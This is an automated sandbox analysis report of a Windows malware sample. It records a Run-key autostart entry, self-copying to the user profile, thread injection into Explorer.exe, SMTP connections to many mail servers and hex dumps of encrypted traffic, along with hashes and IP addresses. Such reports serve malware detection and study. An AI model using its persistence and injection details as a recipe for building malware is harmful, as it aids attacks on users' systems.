Analysis Report for baad.exe

Comment on this report

Summary:

Description	Risk
Autostart capabilities: This executable registers processes to be executed at system start. This could result in unwanted actions to be performed automatically.
Creates files in the Windows system directory: Malware often keeps copies of itself in the Windows directory to stay undetected by users.
Sends Emails: This program sends out e-mails to other people possibly in order to propagate itself.
Performs File Modification and Destruction: The executable modifies and destructs files which are not temporary.
Spawns Processes: The executable produces processes during the execution.
Performs Registry Activities: The executable reads and modifies registry values. It may also create and monitor registry keys.

Table of Contents
expand all	collapse all
General information sample.exe C:\sample.exe Primary Analysis Subject General Information a) Registry Activities b) File Activities c) Process Activities d) Network Activities Explorer.EXE C:\WINDOWS\Explorer.EXE sample.exe injected a remote thread into this process General Information a) Registry Activities b) File Activities c) Process Activities d) Network Activities e) Other Activities netsh.exe C:\WINDOWS\system32\netsh.exe Started by Explorer.EXE General Information a) Registry Activities b) File Activities c) Process Activities d) Other Activities user.exe C:\Documents and Settings\user\user.exe Started by Explorer.EXE General Information a) Registry Activities b) File Activities c) Process Activities d) Network Activities user.exe C:\Documents and Settings\user\user.exe Started by user.exe General Information a) Registry Activities b) File Activities c) Process Activities d) Network Activities user.exe C:\Documents and Settings\user\user.exe Started by user.exe General Information a) Registry Activities b) File Activities c) Process Activities d) Network Activities BN1.tmp C:\DOCUME~1\user\LOCALS~1\Temp\BN1.tmp Started by Explorer.EXE General Information a) Registry Activities b) File Activities c) Windows Service Activities d) Process Activities e) Other Activities services.exe C:\WINDOWS\system32\services.exe NtConnectPort(\RPC Control\ntsvcs was called. General Information a) Registry Activities b) File Activities c) Other Activities cmd.exe C:\WINDOWS\system32\cmd.exe Started by BN1.tmp General Information a) Registry Activities b) File Activities svchost.exe svchost.exe Started by Explorer.EXE General Information user.exe C:\Documents and Settings\user\user.exe Started by sample.exe General Information a) Registry Activities b) File Activities c) Process Activities d) Network Activities user.exe C:\Documents and Settings\user\user.exe Started by user.exe General Information a) Registry Activities b) File Activities c) Process Activities d) Network Activities

1. General Information

	- Information about Anubis' invocation

Time needed:	242 s
Report created:	06/24/09, 22:56:55 UTC
Termination reason:	Timeout
Program version:	1.68.0

1.a) - Network Activity

	- SMTP Conversations:

from ANUBIS:1039 to 94.100.176.20:25
Sender Address: none to Recipient: none
Subject: none
Email Content: none
from ANUBIS:1040 to 209.85.199.114:25
Sender Address: none to Recipient: none
Subject: none
Email Content: none
from ANUBIS:1041 to 209.85.218.15:25
Sender Address: none to Recipient: none
Subject: none
Email Content: none
from ANUBIS:1042 to 66.111.4.74:25
Sender Address: none to Recipient: none
Subject: none
Email Content: none
from ANUBIS:1043 to 216.157.145.27:25
Sender Address: none to Recipient: none
Subject: none
Email Content: none
from ANUBIS:1049 to 203.157.0.1:25
Sender Address: none to Recipient: none
Subject: none
Email Content: none
from ANUBIS:1048 to 69.162.109.202:25
Sender Address: none to Recipient: none
Subject: none
Email Content: none
from ANUBIS:1054 to 88.214.192.192:25
Sender Address: none to Recipient: none
Subject: none
Email Content: none
from ANUBIS:1051 to 83.149.98.166:25
Sender Address: none to Recipient: none
Subject: none
Email Content: none
from ANUBIS:1050 to 88.214.192.192:25
Sender Address: none to Recipient: none
Subject: none
Email Content: none
from ANUBIS:1052 to 88.214.192.192:25
Sender Address: none to Recipient: none
Subject: none
Email Content: none

	- Unknown UDP Traffic:

from ANUBIS:1025 to 192.168.0.1:53

State: Normal establishment and termination - Transferred outbound Bytes: 210 - Transferred inbound Bytes: 1321

from ANUBIS:1044 to 192.33.4.12:53

State: Normal establishment and termination - Transferred outbound Bytes: 21 - Transferred inbound Bytes: 509

from ANUBIS:1046 to 128.8.10.90:53

State: Normal establishment and termination - Transferred outbound Bytes: 21 - Transferred inbound Bytes: 423

from ANUBIS:1047 to 202.12.27.33:53

State: Normal establishment and termination - Transferred outbound Bytes: 20 - Transferred inbound Bytes: 278

from ANUBIS:1055 to 192.168.0.1:53

State: Normal establishment and termination - Transferred outbound Bytes: 44 - Transferred inbound Bytes: 116

	- Unknown TCP Traffic:

from ANUBIS:1053 to 69.162.109.202:443

State: Connection established, not terminated - Transferred outbound Bytes: 96 - Transferred inbound Bytes: 418

Data sent:

    
0000 0000 ffff ffff 3f57 fffd 2aff ffff    ........?W..*...
ffff ffff ffff ffff fafe d7f5 dfff ffff

Data received:

    
7a01 0000 465b 4b49 4047 5d5f 5a42 5c44    z...F[KI@G]_ZB\D
611d 1017 0e72 7020 af65 6863 6e20 6f74    a....rp .ehcn ot
62ee fcec f58e a6a6 96ed f2f6 e8fa fbe8    b...............
e3fe e68f eaa3 9ae3 eeff af90 b9aa 0c14    ................
1f16 131b 1a1d 6b5c 5472 0f06 191c 0d00    ......k\Tr......
0554 6e65 1f10 0141 041a 10ff e4e3 e9ed    .Tne...A........
eefd 96a4 a1ab 8dea e5e4 e9fd e4fb a9f2    ................
ffe5 e4fd dfa2 ba9a 1518 724c 7104 001b    ..........rLq...
0d08 0410 181d 000b 0e1f 7010 5c54 6817    ..........p.\Th.
1a4f 0a19 0cf2 f8f9 feef fb90 a394 e1e8    .O..............
e8e7 e2ff f4f1 e08f ea91 f4f9 f3f3 a6e2    ................
ffe2 741b 1c16 1211 0e04 6b5e 651c 0f00    ..t.......k^e...
171e 0016 0841 0365 5b63 0443 0e18 07fe    .....A.e[c.C....
e5e8 ebe7 e2e6 f5f1 e1ea e9eb 90be 8ce9    ................
fffb aff5 efef fdfd dfa0 bbae 1b06 021d    ................
0469 5f5b 5a6c 1c13 0d0a 1003 1b1f 034b    .i_[Zl.........K
0d00 0000 6f10 5d74 11e4 e6e8 ee8e a790    ....o.]t........
e2f7 f6f4 e3f1 f3ff fffe e2ec dfa5 9ae3    ................
f2e5 b0f3 e0f9 7412 1c10 1f00 030c 1b05    ......t.........
150b 131b 7440 6f06 034f 0603 0117 0c45    ....t@o..O.....E
0311 168b e7ec f6fd f9fe f0fd f6f3 e99e    ................
90fd e5f4 d2fd abff f5f4 c3e4 b0f2 8bab    ................
0613 1e10 1004 0100 0e1f 1006 1200 1c15    ................
0672 704c 1c10 3706 1745 6f44 5490 92ff    .rpL..7..EoDT...
ceff                                       ..

Data sent:

    
0000 0000 ffff ffff 3f57 fffd 2aff ffff    ........?W..*...
3eff ffff ffff ffff fafe d7f5 dfff ffff

Data received:

    
1000 0000 faff ffff 9784 f1ff 7f7d c7f1    .............}..
e150 bdb5 ffff ffff                        .P......

Data sent:

    
0000 0000 9784 f1ff 3f57 fffd 2aff ffff    ........?W..*...
3eff ffff ffff ffff fafe d7f5 deff ffff

Data received:

    
0000 0000 0000 0000                        ........

	- TCP Connection Attempts:

from ANUBIS:1045 to 83.149.98.166:443

2. sample.exe

	- General information about this executable

Analysis Reason:	Primary Analysis Subject
Filename:	sample.exe
MD5:	0765a69edaaa5fc1453eda3ec830bbcf
SHA-1:	19460bc79dcd2f16e1f760aaa7eec80918bd93e3
File Size:	23412 Bytes
Command Line:	"C:\sample.exe"
Process-status at analysis end:	dead
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\hnetcfg.dll	0x662B0000	0x00058000
C:\WINDOWS\system32\mswsock.dll	0x71A50000	0x0003F000
C:\WINDOWS\System32\wshtcpip.dll	0x71A90000	0x00008000
C:\WINDOWS\system32\WS2HELP.dll	0x71AA0000	0x00008000
C:\WINDOWS\system32\WS2_32.dll	0x71AB0000	0x00017000
C:\WINDOWS\system32\Apphelp.dll	0x77B40000	0x00022000
C:\WINDOWS\system32\VERSION.dll	0x77C00000	0x00008000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000

2.a) sample.exe - Registry Activities

	- Registry Values Modified:

Key	Name	New Value
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Run	user	C:\Documents and Settings\user\user.exe /i

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SYSTEM\CurrentControlSet\Services\Winsock\Parameters	Transports	0x5400630070006900700000004e0065007400420049004f00530000000000	2
HKLM\SYSTEM\WPA\MediaCenter	Installed	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	AuthenticodeEnabled	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	DefaultLevel	262144	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	PolicyScope	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	TransparentEnabled	1	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemData	0x5eab304f957a49896a006c1c31154015	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemSize	779	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemData	0x67b0d48b343a3fd3bce9dc646704f394	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemSize	517	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemData	0x327802dcfef8c893dc8ab006dd847d1d	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemSize	918	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemData	0xbd9a2adb42ebd8560e250e4df8162f67	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemSize	229	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemData	0x386b085f84ecf669d36b956a22c01e80	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemSize	370	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	ItemData	%HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK*	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	SaferFlags	0	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	HelperDllName	%SystemRoot%\System32\wshtcpip.dll	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	Mapping	0x0b0000000300000002000000010000000600000002000000010000000000	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	MaxSockaddrLength	16	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	MinSockaddrLength	16	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	UseDelayedAcceptance	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters	WinSock_Registry_Version	2.0	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	Num_Catalog_Entries	3	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	Serial_Access_Num	4	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	DisplayString	Tcpip	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	LibraryPath	%SystemRoot%\System32\mswsock.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	ProviderId	0x409d05229e7ecf11ae5a00aa00a7112b	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	SupportedNameSpace	12	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	DisplayString	NTDS	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	LibraryPath	%SystemRoot%\System32\winrnr.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	ProviderId	0xee37263b80e5cf11a55500c04fd8d4ac	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	SupportedNameSpace	32	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	DisplayString	Network Location Awareness (NLA) Namespace	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	LibraryPath	%SystemRoot%\System32\mswsock.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	ProviderId	0x3a244266a83ba64abaa52e0bd71fdd83	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	SupportedNameSpace	15	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Next_Catalog_Entry_ID	1012	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Num_Catalog_Entries	11	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Serial_Access_Num	4	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004	PackedCatalogItem	%SystemRoot%\system32\rsvpsp.d	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005	PackedCatalogItem	%SystemRoot%\system32\rsvpsp.d	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\user\Local Settings\Temporary Internet Files	1

	- Monitored Registry Keys:

Key Name	Watch subtree	Notify Filter	Count
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	0	Key Change	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	0	Key Change	1

2.b) sample.exe - File Activities

	- Files Created:

C:\Documents and Settings\user\user.exe

	- Files Modified:

C:\Documents and Settings\user\user.exe

\Device\Afd\Endpoint

	- Device Control Communication:

File	Control Code	Times
\Device\Afd\Endpoint	AFD_GET_INFO (0x0001207B)	2
\Device\Afd\Endpoint	AFD_SET_CONTEXT (0x00012047)	1

	- Memory Mapped Files:

File Name

C:\Documents and Settings\user\user.exe

C:\WINDOWS\System32\wshtcpip.dll

C:\WINDOWS\system32\Apphelp.dll

C:\WINDOWS\system32\WS2HELP.dll

C:\WINDOWS\system32\WS2_32.dll

C:\WINDOWS\system32\hnetcfg.dll

C:\WINDOWS\system32\mswsock.dll

C:\Windows\AppPatch\sysmain.sdb

C:\sample.exe

2.c) sample.exe - Process Activities

	- Processes Created:

Executable	Command Line
C:\Documents and Settings\user\user.exe
	C:\Documents and Settings\user\user.exe /r

	- Remote Threads Created:

Affected Process

C:\WINDOWS\explorer.exe

C:\Documents and Settings\user\user.exe

	- Thread Overview:

Time	Number of threads
After 20 seconds	1
After 21 seconds	0

	- Foreign Memory Regions Read:

Process: C:\Documents and Settings\user\user.exe

	- Foreign Memory Regions Written:

Process: C:\Documents and Settings\user\user.exe

Process: C:\WINDOWS\explorer.exe

2.d) sample.exe - Network Activity

3. Explorer.EXE

	- General information about this executable

Analysis Reason:	sample.exe injected a remote thread into this process
Filename:	Explorer.EXE
MD5:	12896823fb95bfb3dc9b46bcaedc9923
SHA-1:	9d2bf84874abc5b6e9a2744b7865c193c08d362f
File Size:	1033728 Bytes
Command Line:	C:\WINDOWS\Explorer.EXE
Process-status at analysis end:	alive
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000
C:\WINDOWS\system32\BROWSEUI.dll	0x75F80000	0x000FD000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\ole32.dll	0x774E0000	0x0013D000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000
C:\WINDOWS\system32\OLEAUT32.dll	0x77120000	0x0008B000
C:\WINDOWS\system32\SHDOCVW.dll	0x7E290000	0x00171000
C:\WINDOWS\system32\CRYPT32.dll	0x77A80000	0x00095000
C:\WINDOWS\system32\MSASN1.dll	0x77B20000	0x00012000
C:\WINDOWS\system32\CRYPTUI.dll	0x754D0000	0x00080000
C:\WINDOWS\system32\NETAPI32.dll	0x5B860000	0x00055000
C:\WINDOWS\system32\VERSION.dll	0x77C00000	0x00008000
C:\WINDOWS\system32\WININET.dll	0x42C10000	0x000CF000
C:\WINDOWS\system32\Normaliz.dll	0x00400000	0x00009000
C:\WINDOWS\system32\iertutil.dll	0x42990000	0x00045000
C:\WINDOWS\system32\WINTRUST.dll	0x76C30000	0x0002E000
C:\WINDOWS\system32\IMAGEHLP.dll	0x76C90000	0x00028000
C:\WINDOWS\system32\WLDAP32.dll	0x76F60000	0x0002C000
C:\WINDOWS\system32\SHELL32.dll	0x7C9C0000	0x00817000
C:\WINDOWS\system32\UxTheme.dll	0x5AD70000	0x00038000
C:\WINDOWS\system32\ShimEng.dll	0x5CB70000	0x00026000
C:\WINDOWS\AppPatch\AcGenral.DLL	0x6F880000	0x001CA000
C:\WINDOWS\system32\WINMM.dll	0x76B40000	0x0002D000
C:\WINDOWS\system32\MSACM32.dll	0x77BE0000	0x00015000
C:\WINDOWS\system32\USERENV.dll	0x769C0000	0x000B4000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll	0x773D0000	0x00103000
C:\WINDOWS\system32\comctl32.dll	0x5D090000	0x0009A000
C:\WINDOWS\system32\msctfime.ime	0x755C0000	0x0002E000
C:\WINDOWS\system32\appHelp.dll	0x77B40000	0x00022000
C:\WINDOWS\system32\CLBCATQ.DLL	0x76FD0000	0x0007F000
C:\WINDOWS\system32\COMRes.dll	0x77050000	0x000C5000
C:\WINDOWS\System32\cscui.dll	0x77A20000	0x00054000
C:\WINDOWS\System32\CSCDLL.dll	0x76600000	0x0001D000
C:\WINDOWS\system32\themeui.dll	0x5BA60000	0x00071000
C:\WINDOWS\system32\MSIMG32.dll	0x76380000	0x00005000
C:\WINDOWS\system32\xpsp2res.dll	0x01100000	0x002C5000
C:\WINDOWS\system32\actxprxy.dll	0x71D40000	0x0001B000
C:\WINDOWS\system32\SAMLIB.dll	0x71BF0000	0x00013000
C:\WINDOWS\system32\SETUPAPI.dll	0x77920000	0x000F3000
C:\WINDOWS\system32\msi.dll	0x7D1E0000	0x002BC000
C:\WINDOWS\system32\ntshrui.dll	0x76990000	0x00025000
C:\WINDOWS\system32\ATL.DLL	0x76B20000	0x00011000
C:\WINDOWS\system32\ieframe.dll	0x42EF0000	0x005CD000
C:\WINDOWS\system32\PSAPI.DLL	0x76BF0000	0x0000B000
C:\WINDOWS\system32\LINKINFO.dll	0x76980000	0x00008000
C:\WINDOWS\system32\NETSHELL.dll	0x76400000	0x001A5000
C:\WINDOWS\system32\credui.dll	0x76C00000	0x0002E000
C:\WINDOWS\system32\dot3api.dll	0x478C0000	0x0000A000
C:\WINDOWS\system32\rtutils.dll	0x76E80000	0x0000E000
C:\WINDOWS\system32\dot3dlg.dll	0x736D0000	0x00006000
C:\WINDOWS\system32\OneX.DLL	0x5DCA0000	0x00028000
C:\WINDOWS\system32\WTSAPI32.dll	0x76F50000	0x00008000
C:\WINDOWS\system32\WINSTA.dll	0x76360000	0x00010000
C:\WINDOWS\system32\eappcfg.dll	0x745B0000	0x00022000
C:\WINDOWS\system32\MSVCP60.dll	0x76080000	0x00065000
C:\WINDOWS\system32\eappprxy.dll	0x5DCD0000	0x0000E000
C:\WINDOWS\system32\iphlpapi.dll	0x76D60000	0x00019000
C:\WINDOWS\system32\WS2_32.dll	0x71AB0000	0x00017000
C:\WINDOWS\system32\WS2HELP.dll	0x71AA0000	0x00008000
C:\WINDOWS\system32\urlmon.dll	0x42CF0000	0x00127000
C:\WINDOWS\system32\webcheck.dll	0x42E40000	0x0003C000
C:\WINDOWS\system32\stobject.dll	0x76280000	0x00021000
C:\WINDOWS\system32\BatMeter.dll	0x74AF0000	0x0000A000
C:\WINDOWS\system32\POWRPROF.dll	0x74AD0000	0x00008000
C:\WINDOWS\system32\WPDShServiceObj.dll	0x164A0000	0x00023000
C:\WINDOWS\system32\WINHTTP.dll	0x4D4F0000	0x00059000
C:\WINDOWS\system32\mydocs.dll	0x72410000	0x0001A000
C:\WINDOWS\system32\PortableDeviceTypes.dll	0x109C0000	0x0002C000
C:\WINDOWS\system32\PortableDeviceApi.dll	0x10930000	0x00049000
C:\WINDOWS\system32\MSCTF.dll	0x74720000	0x0004C000
C:\WINDOWS\system32\SXS.DLL	0x7E720000	0x000B0000
C:\WINDOWS\system32\MPR.dll	0x71B20000	0x00012000
C:\WINDOWS\System32\drprov.dll	0x75F60000	0x00007000
C:\WINDOWS\System32\ntlanman.dll	0x71C10000	0x0000E000
C:\WINDOWS\System32\NETUI0.dll	0x71CD0000	0x00017000
C:\WINDOWS\System32\NETUI1.dll	0x71C90000	0x00040000
C:\WINDOWS\System32\NETRAP.dll	0x71C80000	0x00007000
C:\WINDOWS\System32\davclnt.dll	0x75F70000	0x0000A000
C:\WINDOWS\system32\browselc.dll	0x71600000	0x00012000
C:\WINDOWS\system32\MSGINA.dll	0x75970000	0x000F8000
C:\WINDOWS\system32\ODBC32.dll	0x74320000	0x0003D000
C:\WINDOWS\system32\comdlg32.dll	0x763B0000	0x00049000
C:\WINDOWS\system32\odbcint.dll	0x02310000	0x00017000
C:\WINDOWS\system32\MLANG.dll	0x75CF0000	0x00091000
C:\WINDOWS\system32\rsaenh.dll	0x68000000	0x00036000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\hnetcfg.dll	0x662B0000	0x00058000
C:\WINDOWS\system32\mswsock.dll	0x71A50000	0x0003F000
C:\WINDOWS\System32\wshtcpip.dll	0x71A90000	0x00008000

3.a) Explorer.EXE - Registry Activities

	- Registry Values Modified:

Key	Name	New Value
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\SessionInformation	ProgramCount	2
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Run	user	C:\Documents and Settings\user\user.exe /i

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SYSTEM\CONTROLSET001\SERVICES\TCPIP\LINKAGE	Bind	0x5c004400650076006900630065005c007b00420032004200350031003000	304
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{B2B51064-BBF5-4528-B62B-E6D62A782874}	DhcpServer	255.255.255.255	302
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{B2B51064-BBF5-4528-B62B-E6D62A782874}	EnableDHCP	0	151
HKLM\SYSTEM\CurrentControlSet\Services\Winsock\Parameters	Transports	0x5400630070006900700000004e0065007400420049004f00530000000000	2
HKLM\SYSTEM\WPA\MediaCenter	Installed	0	4
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	HelperDllName	%SystemRoot%\System32\wshtcpip.dll	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	Mapping	0x0b0000000300000002000000010000000600000002000000010000000000	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	MaxSockaddrLength	16	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	MinSockaddrLength	16	1
